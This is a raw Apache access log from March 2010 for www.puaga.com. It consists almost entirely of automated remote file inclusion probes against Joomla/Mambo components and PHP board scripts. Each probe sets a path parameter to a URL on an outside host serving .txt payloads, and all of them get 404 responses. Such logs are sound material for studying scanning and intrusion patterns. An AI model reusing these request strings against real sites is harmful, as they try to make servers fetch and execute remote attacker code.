121.119.192.41 - - [07/Mar/2010:04:02:11 -0800] "GET /logs/access_100201.log//delete_all.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
89.180.166.3 - - [07/Mar/2010:04:02:17 -0800] "GET /logs/scripts.log HTTP/1.1" 206 14876672 "http://www.puaga.com/logs/" "Mozilla/5.0 (Windows; U; Windows NT 6.0; pt-PT; rv:1.9.2) Gecko/20100115 Firefox/3.6 (.NET CLR 3.5.30729)" "www.puaga.com"
121.119.192.41 - - [07/Mar/2010:04:02:19 -0800] "GET /logs/access_100201.log//delete_all.php?board_skin_path=http://webshop.budapestbamako.hu/webshop_en/cache/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:04:02:26 -0800] "GET /alinauS//Gallery/displayCategory.php?basepath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:04:02:30 -0800] "GET /logs/access_100210.log%20%20/alinauS//Gallery/displayCategory.php?basepath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:04:02:30 -0800] "GET /logs/alinauS//Gallery/displayCategory.php?basepath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:04:02:43 -0800] "GET /logs/access_100215.log/send_reminders.php?includedir=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:03:18 -0800] "GET /logs/access_100128.log%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:04:21 -0800] "GET /administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:04:21 -0800] "GET /logs/access_100207.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:04:21 -0800] "GET /logs/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:04:57 -0800] "GET /logs/access_100221.log%20%20/administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:06:09 -0800] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://add-ons.co.uk///mambots/search/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:06:09 -0800] "GET //components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://add-ons.co.uk///mambots/search/ts??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:04:07:37 -0800] "GET /admin/classes/TplLoad.php?full_path_to_public_program=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:04:07:38 -0800] "GET /logs/access_100219.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:04:07:38 -0800] "GET /logs//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:04:07:44 -0800] "GET /logs/access_100209.log%20%20//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:10:41 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:10:41 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:10:41 -0800] "GET /logs/access_100203.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
87.250.255.242 - - [07/Mar/2010:04:10:41 -0800] "GET /diger HTTP/1.1" 301 90 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
87.250.255.242 - - [07/Mar/2010:04:10:44 -0800] "GET /diger/ HTTP/1.1" 200 3545 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:11:02 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:11:02 -0800] "GET /logs/access_100209.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:11:02 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:11:09 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:04:11:33 -0800] "GET /logs///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:04:11:33 -0800] "GET //bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:04:11:33 -0800] "GET /logs/access_100206.log%20%20///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:04:11:49 -0800] "GET /myevent.php?myevent_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:04:11:50 -0800] "GET /logs/access_100217.log%20%20/myevent.php?myevent_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:04:11:50 -0800] "GET /logs/myevent.php?myevent_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
124.136.23.172 - - [07/Mar/2010:04:11:58 -0800] "GET /logs/access_100129.log%20%20/myevent.php?myevent_path=http://www.noin9191.com/ams/ammember/fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:11:58 -0800] "GET /main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:04:11:59 -0800] "GET /solpot.html?body=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:04:11:59 -0800] "GET /logs/solpot.html?body=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:04:11:59 -0800] "GET /logs/access_100220.log/solpot.html?body=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.210.38.8 - - [07/Mar/2010:04:11:59 -0800] "GET /logs/access_100130.log/solpot.html?body=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:12:02 -0800] "GET /logs/access_100301.log//main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:12:02 -0800] "GET /logs//main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:04:12:23 -0800] "GET /logs/access_100214.log%20%20///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:12:24 -0800] "GET /logs/access_100209.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:12:24 -0800] "GET /logs/access_100203.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:12:45 -0800] "GET /components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:12:45 -0800] "GET /logs/access_100209.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:12:45 -0800] "GET /logs/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:12:50 -0800] "GET /logs/access_100203.log%20%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:12:51 -0800] "GET /logs/access_100208.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:12:51 -0800] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:12:51 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:13:00 -0800] "GET /logs/access_100203.log%20/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:13:27 -0800] "GET /logs/access_100301.log//main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:13:27 -0800] "GET /logs//main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.63.235.157 - - [07/Mar/2010:04:13:27 -0800] "GET /main.php?sayfa=http://www.hyonsvc.co.kr//bbs//icon/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:14:05 -0800] "GET /logs/access_100203.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:14:05 -0800] "GET /logs/access_100209.log/components/com_mambatstaff/mambatstaff.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:04:14:10 -0800] "GET /logs///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:04:14:10 -0800] "GET //bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:04:14:10 -0800] "GET /logs/access_100206.log%20%20///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:04:14:39 -0800] "GET /logs/access_100214.log%20%20///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:14:44 -0800] "GET /logs/access_100208.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:14:44 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
193.137.208.199 - - [07/Mar/2010:04:14:44 -0800] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:14:56 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:14:56 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:14:56 -0800] "GET /logs/access_100220.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:15:00 -0800] "GET /logs/access_100208.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:15:00 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:15:03 -0800] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:15:09 -0800] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:15:09 -0800] "GET /logs/access_100208.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:15:09 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zlama.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.808" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:15:12 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:15:12 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:15:15 -0800] "GET /logs/access_100220.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:15:32 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:15:37 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:15:37 -0800] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:15:37 -0800] "GET /logs/access_100128.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:15:38 -0800] "GET /logs/access_100205.log/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:15:49 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:16:15 -0800] "GET /logs/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:16:15 -0800] "GET /logs/access_100208.log/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:16:15 -0800] "GET /components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:04:17:09 -0800] "GET /logs/access_100206.log///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:04:18:42 -0800] "GET /logs/access_100214.log///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
222.239.227.209 - - [07/Mar/2010:04:19:02 -0800] "GET /logs/access_100210.log/alinauS//Gallery/displayCategory.php?basepath=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:19:02 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:19:02 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:19:06 -0800] "GET /logs/access_100220.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:04:19:12 -0800] "GET /logs/access_100206.log///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.221.130.17 - - [07/Mar/2010:04:19:23 -0800] "GET /logs/access_100214.log///bbs///write_update.php?board_skin_path=http://honam5.honamlife.co.kr///ams//amboard//id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:19:50 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:19:59 -0800] "GET /logs/access_100220.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:19:59 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:19:59 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [07/Mar/2010:04:20:02 -0800] "GET /logs/access_100218.log%20%20/error.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [07/Mar/2010:04:20:02 -0800] "GET /logs/error.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [07/Mar/2010:04:20:02 -0800] "GET /error.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
173.212.202.130 - - [07/Mar/2010:04:20:27 -0800] "GET /logs/access_100209.log%20%20/error.php?dir=http://samen-crew.co.cc/media/sc1? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:20:36 -0800] "GET /logs/access_100219.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:20:58 -0800] "GET /logs/access_100221.log%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:04:21:25 -0800] "GET /logs/access_100219.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
199.120.90.223 - - [07/Mar/2010:04:21:27 -0800] "GET /logs/access_100209.log//admin/classes/TplLoad.php?full_path_to_public_program=http://www.lifetrav.it/community/images/fbfiles/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:21:54 -0800] "GET /logs/access_100214.log/editsite.php?returnpath=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:21:54 -0800] "GET /editsite.php?returnpath=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.190.166.35 - - [07/Mar/2010:04:21:54 -0800] "GET /logs/editsite.php?returnpath=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:04:22:00 -0800] "GET /editsite.php?returnpath=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:04:22:02 -0800] "GET /logs/editsite.php?returnpath=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
194.249.18.67 - - [07/Mar/2010:04:22:02 -0800] "GET /logs/access_100214.log/editsite.php?returnpath=http://aerconditionatieftin.ro//templates/COPYME.TXT?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.29.80 - - [07/Mar/2010:04:22:21 -0800] "GET /logs/access_100128.log%20%20/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:22:30 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [07/Mar/2010:04:22:30 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.lumixclub.com/bbs/columbus/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:22:31 -0800] "GET /logs/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
188.93.10.36 - - [07/Mar/2010:04:22:34 -0800] "GET /logs/access_100208.log/components/com_securityimages/lang.php?mosConfig_absolute_path=http://zrego.interfree.it/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
